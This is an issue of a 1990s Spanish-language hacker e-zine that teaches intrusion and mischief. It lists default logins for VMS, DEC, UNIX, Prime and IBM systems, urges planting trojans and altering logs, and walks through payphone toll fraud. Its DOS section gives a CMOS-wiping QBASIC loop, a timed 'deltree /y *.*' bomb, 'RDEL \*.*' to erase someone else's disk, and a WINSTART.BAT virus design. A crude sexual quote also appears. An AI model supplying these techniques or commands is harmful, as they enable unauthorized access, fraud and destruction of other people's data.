
                               <<::RareGaZz::>>
                          "Tu inyeccion estrobonica"

                          oO Numero 7 Primer ao Oo
                              ~~~~~~~~~~~~~~~~~~~
                                   Contenidos:

                       1. Hack,hAck,haCk,hacK
                       2. La nueva etica de los hackers
                       3. Robando a la Telefonica Espaola
                       4. Tips para el hacker ms-dos
                       5. Revision de WareZ
                       6. Exceso Digital
                       7. Guia de HTML para principiantes
                       8. >-C0D3Z-<
                       9. Informacion de algunos servidores
                      10. Cracker de Windows 95
                      11. B00/\/\3r4NG
                      12. NotiLOONS

    "RareGaZz es escrita con fines educativos y la informacion contenida
    no refleja  el punto  de vista del editor  o  sus colaboradores.  Se
    autoriza su reproduccion total o parcial siempre y cuando se incluya
    a la  revista raregazz como  la fuente  de los datos  y la direccion
    (URL) completa  de la pagina oficial."

                      http://www.geocities.com/Baja/4426
                             RAREGAZZ@BIGFOOT.COM

                             \0/     Editor    \0/
                              |   CrackSmoker   |
                             / \  ~~~~~~~~~~~  / \

           CRACKSMOKER - KILLERBOT -  LEPOMPEITOR - RARETRIP - MR.X
           ^^^^^^^^^^^   ^^^^^^^^^    ^^^^^^^^^^^   ^^^^^^^^   ^^^^
              Esta es la nueva -y ultima- llave PGP de 2048 bits
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3

mQENAzPMAlMAAAEIAMZQzI19DkA4QyK80OIExuCrZhp840Qn33nMC1laDoMAFPdU
M/eXfxWnGb5cl0JX4UsmqYhH06w6Eh7LKN3M8uihxl7grSqyrK0kWheDpCS2gTCV
qoD8FM5sjQon/vDtc0rMy3qm9JUSKEEiN9NiAlT4Ppa5Ms5rFxT8VAxRJ6PYuh99
3jvDGhjMmKsNatv3UKiNiztfOtfP+FzO/NouPpUh38q2/OryHIgBsoGSIKJjWwHw
jhsj0PHl2cHoRsYWJhFCfAHFcQ29jiU17JFItxvZ8klEgPS/jRphpi93ICJ1pWq7
2TSZ2Y+fH4LBlRgGZ/pmkrtAahP7rjA7ZhGTxN0ABRG0KVJhcmVHYVp6IDIwNDgg
Qml0cyA8UkFSRUdBWlpAQklHRk9PVC5DT00+
=e/tl
-----END PGP PUBLIC KEY BLOCK-----

                  " Dejad que las nias se toquen entre si "
                                           Pervertido del D.F.,
                                           ~~~~~~~~~~~~~~~~~~~~
     " Como te va en la universidad ???
                   muy bien ma' ... ahh, gracias por pagar la fianza "
                                           Cracksmoker en dias recientes
                                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

 Intro...

 Esto que estan leyendo lo edite - recorte y modifique yo mero asi que las
 preguntas y mentadas se las aguantan por que no les pienso decir mi e-mail
 >B-) mi articulo favorito de este numero es exceso digital de NiK, y
 Hack,hAck,haCk,hacK (por si querian saber).
 Quizas lo mas importante que logre fue convencer a raretrip de permitirme
 modificar la pagina de la revista cosa que no fue facil. La verdad se ve
 casi igual pero cambie algunos nombres de archivos y puse scripts para UNIX
 y LINUX como editores de logs y otras cositas.
 Yo no soy bueno para estar delante de los rayos catodicos hablando con el
 monitor y ademas mi compa de cuarto ya esta molestandome para que apague la
 compu por que quiere dormir |-( los dejo con nada mas que un monton de ceros
 y unos para su extreimiento y leisure ... CkSmkr

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
 
                               <<::RareGaZz::>>
                          "La resistencia es inutil"

                         ||~"~"~"~"~"~"~"~"~"~"~"~"~||
                         || Hack, hAck, haCk, hacK  ||
                         || ~~~~~~~~~~~~~~~~~~~~~~~ ||
                         *"~"~"~"~"~"~"~"~"~"~"~"~"~"*

 "Parte de la informacion aqui contenida a sido sacada del excelente texto
  por The Mentor. Este texto no esta tal cual lo escribio Mentor, a sido
  ampliado y estudiado para adaptarlo a las necesidades especificas del texto.
  La seccion sobre redes NUIS y NUAS a sido removida mientras que el paso 2
  `preparacion mental' fue dejado casi intacto. Si has visto alguna de la
  informacion aqui contenida ya sabes de donde salio..."
  raretrip.

 Ciertamente para ser hacker no existe medicamento (quiza alguna pastilla
 pueda ayudar :) pero si hay un metodo a seguir y aqui en raregazz en este
 numero tratare de explicarlo. Debes seguir los pasos que te voy a dar con
 precision, inteligencia y mucha paciencia. Nadie se convierte en hacker de
 un dia a otro obtener el conocimiento y las herramientas necesarias lleva
 mucho tiempo e intentos.

 PASO 1. Herramientas
         """"""""""""
 - Un scanner telefonico (ToneLoc y PhoneTag sirven para esto)
 - Un buen cliente de comunicaciones (con distintas emulaciones como ProComm)
 - Una lista de los defaults para cada sistema.
 - Un scanner de direcciones I.P. (en caso de contar con conexion permanente)
 - Un cliente de Telnet (con distintas emulaciones)
 * emulaciones minimas: Ansi, Avatar, Prism, TTY, VT52, VT102. El programa
   debe ser capaz de emular distintos baud rates (300,1200,2400,4800,9600) y
   tambien debera poder cambiar de Paridad (None,Even,Odd,Space,Mark), Data
   Bits (7,8) y Stop Bits (1,2).

 PASO 2. Preparacion Mental
         """"""""""""""""""
 Debes estar preparado para fracasar en muchisimos intentos pero valdra la
 pena en el momento que logres hackear tu primer sistema. Debes tener en
 cuenta que estaras tratando de entrar a un sistema para conocerlo y dominarlo
 unicamente mas no para daarlo o modificarlo. Si alguna vez te dijeron que
 es mejor armonizar con la naturaleza que modificarla entonces aplica esto a
 tus experiencias como hacker. Ten cuidado, no seas flojo y limpia tus huellas
 antes de abandonar un sistema al que hayas entrado con la cuenta de otra
 persona. Estas son las recomendaciones mas importantes:
  I. No daes intencionalmente *ningun* sistema.
 II. No alteres ningun archivo excepto los necesarios para asegurar que nadie
 pueda detectarte y asegurar futuros accesos (Caballos de Troya, Alterar Logs,
 y cosas asi son necesarias para sobrevivir el mayor tiempo posible dentro de
 un sistema).
 III. No dejes tu nombre (o el de otra persona), handle -nick- o numero
 telefonico en ningun sistema.
 IV. Ten cuidado con quien compartes informacion.
 V. No des a conocer tu numero telefonico a nadie sin importar que tan k-rad
 parezcan ser. Esto incluye SYSOPs de BBS. Si necesitas algunos datos para
 ser validado consiguete una revista de nios como Gasparin y busca los datos
 que aparecen en algunas paginas (nombre,direccion,telefono,ciudad), tambien
 puedes usar los datos que vienen en las revistas de moda donde gente busca
 correspondencia con otras personas.
 VI. No intentes hackear computadoras del gobierno o de la compaia telefonica
 si eres principiante.
 VII. No uses C0D3Z (PBX's) mas de lo necesario. Si los usas por mucho tiempo
 seras sorprendido. punto.
 VIII. No temas a ser paranoico. Recuerda que *estas* haciendo dao a un
 administrador. No te lastimara tener tu disco encriptado o enterrar tus
 notas en el patio :-)
 IX. Nunca pongas nada en BBS sobre algun sistema que estes hackeando,
 tampoco uses sus sistemas de correo sin encripcion. Recuerda que el tipico
 SYSOP lee todos los mensajes de su sistema en su afan de sentirse dios (es
 por eso que es el sysop de un BBS).
 X. No tengas miedo en preguntar. Para eso estan los hackers avanzados, no
 esperes que todo sea contestado pero vale la pena intentar.
 XI. Finalmente tendras que hackear, no importa lo que hagas ni cuanto tiempo
 te la pases en BBS de hackers o compartas informacion con otros algun dia
 tendras que realmente empezar a hacerlo. Los mejores lugares para empezar
 a hackear son las universidades y colegios donde los admins son jovenes
 y creen que sus sistemas son invulnerables lo que paradojicamente los hace
 vulnerables.
 Finalmente te recomiendo hacer un viaje a tu universidad local y pedir un
 login/password para tener acceso a internet. Lo bueno de esto es que te
 permiten conocer un sistema desde adentro podras explorarlo lo mas que
 quieras y asi ganar experiencia en el uso de unix, linux, o en cualquiera
 que sea el sistema que tengan.

 PASO 3. ENCONTRAR UN SISTEMA
         """"""""""""""""""""
 Para encontrar una computadora conectada al telefono es necesario hacer algo
 conocido como phone scanning. Phone scanning o barrido de telefonos consiste
 en hacer llamadas a numeros telefonicos de forma consecutiva o al hazar para
 encontrar tonos de computadora que son llamados carriers. Este metodo es
 necesario para todo hacker que quiera encontrar sistemas interesantes y
 desconocidos. Lo bueno de hacer esto es que nunca sabes que tipo de sistema
 encontraras, puede ser el de un MacDonalds o tambien el de la gasolinera de
 la esquina...
 Suponiendo que los numeros en tu ciudad sean de 5 digitos algo logico y no
 muy dificil de hacer es realizar una busqueda en los ultimos 3 digitos de
 un principio determinado. Digamos que buscaremos desde 39000 a 39999 asi,
 se tendrian que hacer 999 intentos y en ocasiones encontras numeros de Fax,
 Telex, PBX's, etc. hacer esto manualmente suena estupido y lo es, por lo que
 necesitaras un programa buscador de carriers -disponible en la pagina de la
 revista- configurarlo y empezar a jugar. Si no quieres que tu cuenta
 telefonica llegue a tu casa en cajas puedes buscar los numeros que se
 encuentran en los prefijos de llamada gratuita. Aqui en Mexico todos los
 numeros que comienzan en 01-800 (antes 91800) cargan el costo de la llamada
 a la compaia que recibe la llamada. Otra forma de hacerlo es por medio de
 un PBX, si no sabes que es un pbx espera un texto sobre eso proximamente...
 El mismo tipo de busqueda puede hacerse en Internet. Hay programas que buscan
 sistemas determinados en direcciones IP.

 PASO 4. ENCONTRE UNA COMPUTADORA, AHORA QUE??
         """""""""""""""""""""""""""""""""""""
 No importa como diablos encontraste un sistema pudo ser a travez de una
 red o de un scanneado telefonico, pero ahora que hacer?? Pues principalmente
 llegar al prompt y de ahi hackear un login y la contrasea correcta. Esto
 es relativamente facil a travez de la ingenieria social y muy dificil con
 un ataque bruto asi que la otra alternativa son los defaults.
 A continuacion una lista de los sistemas que probablemente encontraras y
 los defaults que necesitaras saber.

 VMS  -  La computadora VAX es creada por Digital Equipment Corporation (DEC)
 y corre el sistema operativo VMS (virtual memory system). VMS se caracteriza
 por su prompt 'Username:'. Este sistema no te dira si has entrado un login
 correcto o no y te desconectara despues de tres malos intentos. Tambien
 mantiene un record de todos los logins que fallaron e informa al dueo de la
 cuenta la proxima vez que entre cuantos intentos fallados se hicieron. Es
 uno de los sistemas mas seguros desde fuera pero ya dentro tiene varios
 errores en la seguridad. Las VAX ademas tienen uno de los mejores archivos
 de ayuda de entre los demas sistemas, para accesar a esta ayuda solo escribe
 HELP en el prompt.
 Las cuentas defaults comunes son: [ usuario: password [,password] ]

                 Login      Password
                 ~~~~~      ~~~~~~~~
                 SYSTEM     OPERATOR o MANAGER o SYSTEM o SYSLIB
                 OPERATOR   OPERATOR
                 SYSTEST    UETP
                 SYSMAINT   SYSMAINT o SERVICE o DIGITAL
                 FIELD      FIELD o SERVICE
                 GUEST      GUEST o sin password
                 DEMO       DEMO o sin password
                 DECNET     DECNET

 DEC-10  -  Esta es el equipo de computo mas nuevo que existe dentro de la
 linea de DEC's. Operan el sistema operativo TOPS-10. Este tipo de maquinas
 se reconocen por el prompt "." Las series DEC-10/20 son amables con los
 hackers permitiendo varios intentos en el login prompt sin guardar un log
 de los intentos fallados. Las cuentas estan en forma [xxx,yyy]. Lo mejor
 de este sistema es la posibilidad de obtener informacion sobre las personas
 en linea antes de entrar a el usando el comando systat. Si ves una cuenta
 que lea [234,1001] BOB JONES, seria inteligente probar como password BOB,
 JONES, BOBBY, etc. Para entrar al sistema se usa el comando:
 login xxx,yyy [enter]
 password:
 Este sistema como antes lo habia dicho, permite intentos sin limite y ademas
 te avisa si el login que estas usando existe.
 Las cuentas defaults comunes son:

                 Login      Password
                 ~~~~~      ~~~~~~~~
                  1,2       SYSLIB o OPERATOR o MANAGER
                  2,7       MAINTAIN
                 5,30       GAMES

 UNIX  -  Este sistema ya a sido ampliamente revisado en los numeros
 anteriores de este zine, de hecho tenemos publicada una lista de cuentas
 defaults que reproducire del numero pasado:

              ĿĿ
               Default     Password  Default     Password 
              ĴĴ
              decnet      ddennet   guest       friend    
              field       service   guest       welcome   
              system      manager   default     user      
              decnet      nonpriv   field       digital   
              field       test      netnonpriv  nonpriv   
              postmaster  mail      sysmaint    service   
              sysmaint    digital   system      operator  
              system      manager   system      syslib    
              system      uetp      systest_cligsystest   
              userp       user      sysadmin    admin     
              daemon      daemon    sysbin      sysbin    
              

 PRIME  -  Esta computadora opera con el sistema operativo Primos. Son faciles
 de detectar ya que lo reciben a uno con el mensaje "Primecon xx.xx.xx" o
 algo parecido dependiendo de la version que te encuentres. Usualmente no
 ofrecen ningun prompt asi que debes escribir "login <usuario>". Si la version
 es anterior a la 18.00.00 puedes presionar un monton de caracteres de escape
 o CTRL-C y entraras. Este sistema ofrece la capacidad de conectarte a los
 NUAS de todo el mundo con el comando NETLINK...sintax: nc <nua>
 Las cuentas defaults comunes son:

                 Login      Password
                 ~~~~~      ~~~~~~~~
                 PRIME      PRIME o PRIMOS
                 PRIMOS_CS  PRIME o PRIMOS
                 PRIMENET   PRIMENET
                 SYSTEM     SYSTEM
                 NETLINK    NETLINK
                 TEST       TEST o PRIME o PRIMOS
                 GUEST      GUEST o PRIME
                 GUEST1     GUEST

 HP-x000  -  Este sistema es elaborado por Hewlett-Packard. Se caracteriza por
 el prompt ":". La secuencia de entrada a este sistema es una de las mas
 complicadas debes escribir:
 "HELLO SESSION NOMBRE,USUARIO,NOMBRE-DE-CUENTA,GRUPO"
 Afortunadamente algunos de esos campos pueden dejarse en blanco. En ocasiones
 todos los campos estan protegidos con passwords por lo que este sistema no
 es uno de los mas faciles de accesar.
 Las cuentas defaults comunes son:

                 Login               USER
                 ~~~~~               ~~~~
            MGR.TELESUP,PUB           MGR
            Acct: HPONLYG rp: PUB
            MGR.HPOFFICE,PUB
            FIELD.SUPPORT,PUB         FLD,
            MAIL.TELESUP,PUB          MAIL,
            MGR.RJE
            FIELD.HPP189 ,HPP187,HPP189,HPP196
            MGR.TELESUP,PUB,HPONLY,HP3

 IRIS  -  Iris significa (interactive real time information system).
 Originalmente corria en PDP-11's, pero ahora corre en otras minis. Para
 identificar uno de estos sistemas busca el texto "Welcome to `IRIS' R9.1.4
 Timesharing" y el prompt ACCOUNT ID? (algunas veces es cambiado). IRIS no
 tiene limites a la hora de hackear una cuenta y no guarda un log de los
 intentos fallados. (si alguien conoce defaults pueden enviarlos :)

 VM/CMS  -  Este sistema es ejecutado en las super computadoras de IBM
 (International Business Machines) llamadas mainframes. Una vez conectado
 a una de estas computadoras te mostrara un mensaje asi "VM/370 ONLINE",
 y te dara un prompt "." justo como la TOPS-10 lo hace. Para entrar debes
 ejecutar: LOGON <usuario>
 Las cuentas defaults comunes son:

                 Login               Password
                 ~~~~~               ~~~~~~~~
               AUTOLOG1        AUTOLOG o AUTOLOG1
               CMS             CMS
               CMSBATCH        CMS o CMSBATCH
               EREP            EREP
               MAINT           MAINT o MAINTAIN
               OPERATNS        OPERATNS o OPERATOR
               OPERATOR        OPERATOR
               RSCS            RSCS
               SMART           SMART   ???
               SNA             SNA
               VMTEST          VMTEST
               VMUTIL          VMUTIL
               VTAM            VTAM

 NOS  -  NOS significa Networking Operating System y corre en la Cyber
 computadora hecha por Control Data Corp. A este sistema lo puedes identificar
 facilmente por la bienvenida "WELCOME TO THE NOS SOFTWARE SYSTEM...". El
 primer prompt que recibiras sera FAMILY: (presiona enter) depues llegaras
 a otro prompt USER NAME: donde cada uno es de 7 digitos alfanumericos y
 son dependientes del sistema por lo que no son palabras o frases conocidas.

 Decserver  -  Las DECs son una serie de computadoras conectadas entre si
 para formar una sola unidad de procesamiento, la funcionalidad de estos
 sistemas es altamente utilizado por los hackers para quebrar passwords de
 cuentas unix por la rapidez del sistema. El prompt usualmente sera:
 "Enter Username>" aunque yo he visto otros prompts en estos sistemas. El
 nombre de usuario puede ser cualquier cosa, lo mejor sera presionar algo
 nada sospechoso como `c' o algun numero. De ahi te presentara con el prompt
 `local>'. De ahi debes ejecutar `c <sistema>' para conectarte. Para obtener
 una lista de sistemas conectados ejecuta `sh' `services' o `sh nodes'. En
 algunos sistemas DEC'S existen comandos como MODEM o DIAL que permiten
 hacer uso de un modem para llamadas externas que te permitiran marcar a BBS
 internacionales a expensas de la compaia que opera el DEC.

                           SISTEMAS QUE NO RESPONDEN
                           ~~~~~~~~~~~~~~~~~~~~~~~~~
 Casi siempre que hagas un `barrido de telefonos' encontraras sistemas que
 no ofrecen prompts de ningun tipo dando un sentimiento de frustracion a todo
 hacker wannabe. Recuerda que algunas veces puede tratarse de Telex, Fax o
 algun otro tipo de carrier asi que asegurate del tono que recibes. Para hacer
 que *algo* pase sigue las siguientes instrucciones...

 Deberas probar todas las posibilidades usando diferentes configuraciones en
 tu programa de comunicaciones juega con la paridad, baud rate (usualmente
 todos contestan a 300bps), y stop bits. Algunos sistemas como seguridad
 unicamente ofrecen conexiones a velocidades de 600 o 1100 bits asi que
 asegurate de intentar todas. Envia Enters, Hard Breaks (todo programa de
 comunicacion lo hace) y distintas combinaciones de ambos. Prueba escribiendo
 puntos o palabras como LOGIN, LOGON, ETC. Envia caracteres de control como
 CTRL + A..Z
 Lo mas importante es los tipos de terminales, si empiezas a recibir basura
 en tu programa de comunicaciones cambia tu terminal. Generalmente lo tenemos
 en ANSI pero a la hora de hackear yo recomendaria vt-100 o alguna otra como
 AVATAR o PRISM.

 Si haciendo lo anterior no has podido entrar probablemente sea necesario un
 software proporcionado por la compaia duea del sistema como lo hace
 McDonald's y Gigante (Mexico).  Si el numero telefonico que quieres penetrar
 es 100 intentar marcar via voz a 101 o 99 y usando ingenieria social obten
 informacion necesaria para lograr tu objetivo.

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

                      ETICA DE LOS HACKERS PARA LOS 90'S

 Las primeras generaciones de hackers crearon sus propias reglas de conducta
 que con el paso del tiempo han quedado obsoletas. En este texto se muestran
 las reglas de conducta y objetivos de los hackers de 1958 y su equivalente
 con la etica actual.

     1958 - TODA LA INFORMACION DEBE SER LIBRE

     1997 - EL ACCESO A LA INFORMACION SOBRE LA TECNOLOGIA DEBE SER GRATIS

     "Es estupido y ridiculo pensar que las compaias e individuos deben
     proporcionar sus productos gratis."
     Probablemente los primeros hackers se referian con esta sentencia a
     proporcionar el codigo fuente de algun programa a la comunidad o tal
     vez se referian a la informacion sobre carriers o logins para sistemas
     pero dudo mucho que se refirieran a la informacion que actualmente se
     vende como software o publicaciones electronicas como el New York Times.
     El unico heroe que existiria si esta sentencia debiera ser seguida al
     pie de la letra seria el "WaReZ DuDe" que proporciona acceso gratuito
     al codigo comercial de alguna compaia.

     Una diferente interpretacion seria: "El acceso a las computadoras y a
     la tecnologia necesaria para accesar a la informacion debe ser gratis.
     Las escuelas y librerias publicas deben ser equipadas con computadoras
     y acceso a internet en cantidades adecuadas para permitir a aquellos
     sin los medios ser parte de la revolucion de las computadoras. Este
     acceso deber ser ilimitado y no estar restringido, los individuos deben
     tener acceso a la libertad de elegir que informacion desean obtener.
     La prohibicion de cualquier tipo de informacion (pornografia,bombas,etc)
     solo fomenta el deseo de obtenerla a como de lugar."

2. 1958 - ACCESO A LAS COMPUTADORAS -- Y TODO LO QUE PUEDA ENSEARTE ALGO
          SOBRE COMO FUNCIONA EL MUNDO -- DEBE SER ILIMITADO Y TOTAL.

   1997 - TECNOLOGIA PARA LAS MASAS DEBE SER BARATA.
          TECNOLOGIA DESCARTADA DEBE SER GRATIS!

    La idea de los primeros hackers era bastante buena pero hoy en dia parece
    una utopia el lugar donde las computadoras sean gratuitas. A falta de
    mentes brillantes que logren esto muchos se han conformado con pedir el
    acceso a la tecnologia que a pasado de moda gratis. Es una forma de
    equipar escuelas con computadoras. El problema es que la mayoria de las
    compaias prefieren tirarlas que gastar dinero en el tramite que lleva el
    donar computadoras.
    "Los hackers de los 70's como Bill Gates se han vendido a los BMW y
    Corvettes en lugar de hacer la tecnologia gratuita o por lo menos barata
    a las masas."

3. 1958 - DESCONFIA DE LA AUTORIDAD -- PROMUEVE LA DESCENTRALIZACION

   1997 - DESCONFIA DE TODOS -- PROMUEVE UN GOBIERNO DESCENTRALIZADO

    Los hackers de hoy en dia nos enfrentamos a muchos mas problemas y
    enemigos que aquellos que empezaron. Para empezar nosotros burlamos
    la seguridad de las compaias telefonicas, hacemos a otros hackers
    celosos y la policia cuenta con hackers traidores.

4. 1958 - LOS HACKERS DEBEN SER JUZGADOS POR SUS HACKS, NO POR CRITERIOS
          ESTUPIDOS COMO SEXO, RAZA, EDAD O POSICION SOCIAL.

   1997 - LOS HACKERS DEBEN SER JUZGADOS POR SUS HACKS. PUNTO.

    Los hackers que forman parte de la sociedad conviven con hackers de
    distintas culturas, colores, sexos y preferencias sexuales :) Negar
    a un tipo de hacker especifico es negar a la sociedad misma.
           
5. 1958 - TU PUEDES CREAR ARTE Y BELLEZA EN UNA COMPUTADORA

   1997 - TU PUEDES ELEGIR ENTRE CREAR BELLEZA O CAOS EN UNA COMPUTADORA,
          LA DECISION ES TUYA.

    Esta se explica por si sola. Asi como todo en la vida - puedes elegir
    entre usar tus talentos para bien o mal. Ultimadamente, la decision
    es tuya.

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
 
                           PhuCk1nG a la 73l3F0n1C4
                           ~~~~~~~~~~~~~~~~~~~~~~~~
 Si quieres hacer llamadas gratis desde los telefonos publicos de la
 telefonica espaola desde telefonos como el que se muestra en el diagrama
 sigue las indicaciones . . .

 Primero necesitas encontrar un telefono de la Telefonica que tenga el
 enchufe al alcance y donde no llame mucho la atencion ya que necesitaras
 desconectarlo brevemente. Si encuentras este tipo de telefonos preparaos
 para hacer llamadas gratis nacionales e internacionales.

                 ___________Hoyo_____
                /                    \
                |          -----     |
                | /-\     |     |    |
                | \_/      -----     |
                | [|]     mf    ?    |
                | [|]     1  2  3    |
                | [|]     4  5  6    |
                | [|]     7  8  9    |
                | /-\     *  0  #    |
                | \-/       _______  |
                |          |       | |
                |          |_______| |
                |--------------------|
                \____________________/
                          |Plug!|
                          |_____|

 Inserta una moneda de 25 pesetas en el telefono (el slot largo de 25 pesetas
 no en el pequeo). Despues, presiona el audicular nueve decimas hacia abajo
 hasta que sientas un poco de resistencia. Si tu moneda es devuelta lo has
 hecho mal, pero si la pantalla comienza a flashear lo hiciste correctamente.

 Ahora seria bueno poner una tarjeta sobre la pantalla con algun numero
 apuntado (para disimular) por si alguien pasa por el telefono no vea la
 pantalla flasheando.

 Una vez hecho esto, marca "003". Cuando se conecte escucharas una grabacion
 en espaol y rapidamente desconecta y conecta el telefono. Ahora escucharas
 un tono parejo y todo lo que teneis que hacer es marcar el boton "mf" que
 sirve para hacer otra llamada cuando hayas colgado. Una ves que marques el
 boton "mf" eres libre para llamar a cualquier parte del mundo!

 Si terminaste de llamar presiona "mf" de nuevo para hacer otra llamada.
 Cuando cuelgues probablemente recibiras tu peseta.

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

                        "TIPS PARA EL HACKER DE MS-DOS"
                             Primera parte por YO
                             ~~~~~~~~~~~~~~~~~~~~
  Este texto va dirigido a los estudiantes de los colegios que tengan
  laboratorio de computacion donde usen windows y DOS (en los colegios
  nunca te van a ensear unix puesto que la mayoria de ellos, usan ese
  sistema para facilitar la entrada de notas a los profesores), o
  cualquier persona en general...

PROFE MALO :

El profe desactivo la disquetera desde el SETUP y le ha puesto clave, no
es problema solo tienes que hacer este programa con el QBASIC :

FOR I=34 TO 65535
OUT I,34
NEXT I

Y listo.. este programa, borra el setup completo y solo tienes que detectar
el disco duro, etc...
Nota : Este programa lo he probado en el Lab de Comp de mi colegio y en mi
casa, no se si sirva en todos los PC, y tampoco si produce algun dao...

ESCONDIENDO DIRECTORIOS :

Esto sirve para esconder cosas XXX, archivos importantes, o programas del
profesor de comp.
Lo que tienes que hacer es crear un directorio con caracteres especiales
ASCII () y le haces un "ATRIBB nombre_directorio +h +r +s -a".
                 [ caracter recomendado: ALT + 255 ]
Esto funciona en DOS y en windows, porque al poner attribb solo, este muestra
solo los archivos, no los directorios y para poder entrar debe poner el
nombre del directorio que va a hacer casi imposible entar por los caracteres
ASCII, deben estar pensando que windows puede, pues no, porque por tener
caracteres especiales, windows dice que no existe o no tiene nada, ya que
windows cambia esos caracteres, el archivos se vera con otro nombre y
no se podra borrar, pero para entar a ese directorio, ustedes deben hacer
un archivo por lotes que sustituya el directorio por una unidad con la
utilidad SUBST :

@ECHO OFF
SUBST unidad_nueva: unidad:nombre_directorio
unidad_nueva:

         [ Si nuestro directorio se llama C:\(ALT+255) se haria asi:
           SUBST F: C:\(ALT+255) <-- ENTER
           F:                    <-- ENTER
           donde F: es el dir con los programas que quieras esconder.
           Para deletear el nuevo escribe esto:
           SUBST /D F:                                                ]

Asi podran grabar cualquier programa al computador sin que el profe se de
cuenta...

 En el archivo ZIP incluido con esta revista viene un programa TSR que hace
 que algunas aplicaciones se ejecuten a una hora determinada, sirve para una
 buena broma a algun amigo o profesor que sepa poco...
 Ej: delay /t15:30 /fdeltree /y *.*
 (no lo hagan es un ejemplo daino)
      [ La computadora no debera ser apagada hasta que llegue la hora ]

                        "TIPS PARA EL HACKER DE MS-DOS"
                            Segunda parte por mr.x
                            ~~~~~~~~~~~~~~~~~~~~~~

 yo nomas les voy a ensear a usar la utileria RDEL.COM (incluida en el
 archivo UTILS.ZIP) que me parece bastante divertida. Este archivo lo consegui
 como codigo fuente en una revista impresa mexicana.

 primero veamos una estructura ms-dos ejemplo:

        |---DOS
        |             |---SYSTEM
    C:\-|---WINDOWS---|
                      |---TEMP
                      |
                      |---FONTS

 supongamos que quisieramos borrar todos los archivos que tengan extension
 .tmp y que esten en el directorio windows y los que siguen pero sin borrar
 los archivos .tmp de otros directorios. usualmente hariamos:

 C:
 CD\WINDOWS
 DEL *.TMP
 CD\WINDOWS\SYSTEM
 DEL *.TMP
 CD\WINDOWS\TEMP
 DEL *.TMP
 CD\WINDOWS\FONTS
 DEL *.TMP

 pero casi siempre el directorio windows tiene varios subdirectorios lo que
 hace a este metodo cansado y lento. veamos como se haria con RDEL.COM :

 C:
 CD\WINDOWS
 RDEL *.TMP

 Al usar la " \ " en este comando borra los archivos que le digamos de TODOS
 los subdirectorios del directorio principal. Como ultimo ejemplo benigno
 seria borrar todos los FILE_ID.DIZ del disco duro:

 RDEL \FILE_ID.DIZ

 si queremos borrar todos los archivos del disco (de otra persona claro) sin
 necesidad de que aparesca Y/N usamos el programa asi:

 RDEL \*.*

 si usamos la utilidad de YO y la unimos a esta tendremos una bomba de tiempo
 bastante efectiva. ! tienes que poner a rdel.com en el path para que el
 comando pueda ser ejecutado desde cualquier directorio !

 [                              que es el path ?
  cuando ejecutas un programa como FORMAT.COM o WIN.COM lo puedes hacer sin
  importar en que directorio o drive estas por que el programa esta en el
  path. para saber cual es el path (o directorios en los que puedes guardar
  archivos para ser ejecutados desde cualquier parte) escribe en el prompt
  PATH y da un enter. si copias un programa a un directorio que este en el
  path se ejecutara desde cualquier subdirectorio o drive. La linea path se
  puede definir desde el AUTOEXEC.BAT poniendo una linea mas o menos asi en
  el archivo:  PATH=C:\DOS;C:\PGP;C:\WINDOWS;C:\XXX;C:\LOQUESEA;
  los directorios estan divididos por " ; " (punto y coma) para que sean
  reconocidos como variables del sistema.  CkSmkr                           ]


                        "TIPS PARA EL HACKER DE MS-DOS"
                    Tercera parte por raretrip para RareGaZz
                                -bye bye virii-

 Despues de haber leido y entendido esta parte ustedes podran crear sus
 propios VIRUS basados en MSDOS!! Para hacerlo no necesitan conocimientos
 previos de programacion ni cosas de esa especie. Lo unico que necesitan
 conocer son algunos comandos BATCH y features de sistemas como windows.
 Puedes modificar este virus tanto como quieras para adaptarlo a diferentes
 sistemas y niveles de venganza!

 BASE DEL VIRUS
 El virus se basa en el feature de todas las versiones windows de ejecutar
 el archivo WINSTART.BAT si lo encuentra en C:\WINDOWS antes de iniciar el
 sistema por completo. Recuerda que todas las versiones de windows se ven
 afectadas.
 Lo que hace el virus es simplemente buscar el archivo userz1.dat en el
 directorio c:\windows si lo encuentra simplemente devuelve el control a
 windows y todo sigue normal. En caso de no encontrar el archivo userz1.dat
 en el directorio comienza el conteo...washington, we got a problem!
 En el codigo original del programa solamente espera que se inicie windows
 8 veces para ejecutar el programa que tu quieras pero eso puedes modificarlo.
 Cuando se borra el userz1.dat se crean archivos 'temporales' que serviran
 de contador del virus; revisando el codigo entenderas su funcion.

 Cuando se instala el programa revisa si existe el c:\windows\winstart.bat
 si lo encuentra lo copia a c:\windows\after.bat y pone unicamente en el
 c:\windows\winstart.bat el comando CHKSYS una vez ejecutado chksys al
 finalizar correra c:\windows\after.bat y regresara el control a windows.
 En total, la instalacion necesita copiar los archivos
 - chksys.bat
 - sysinis.ini
 - bakbmb.ini
 al directorio c:\windows para el buen funcionamiento del virus y copiar
 el archivo execute.dat a c:\windows\winstart.bat que contiene el comando
 chksys
  [ se refiere al virus incluido en el archivo virii.zip pero tu virus bien
    podria copiar los archivos chksys.bat, sysinis.ini y bakbmb.ini al dir
    de windows y agregar la linea CHKSYS al winstart.bat ]

 PAYLOAD
 El virus necesita los archivos c:\windows\sysinis.ini y c:\windows\bakbmb.ini
 pues esos son los programas que ejecutara cuando la pc con windows se inicie
 8 veces *despues* de haberse eliminado userz1.dat
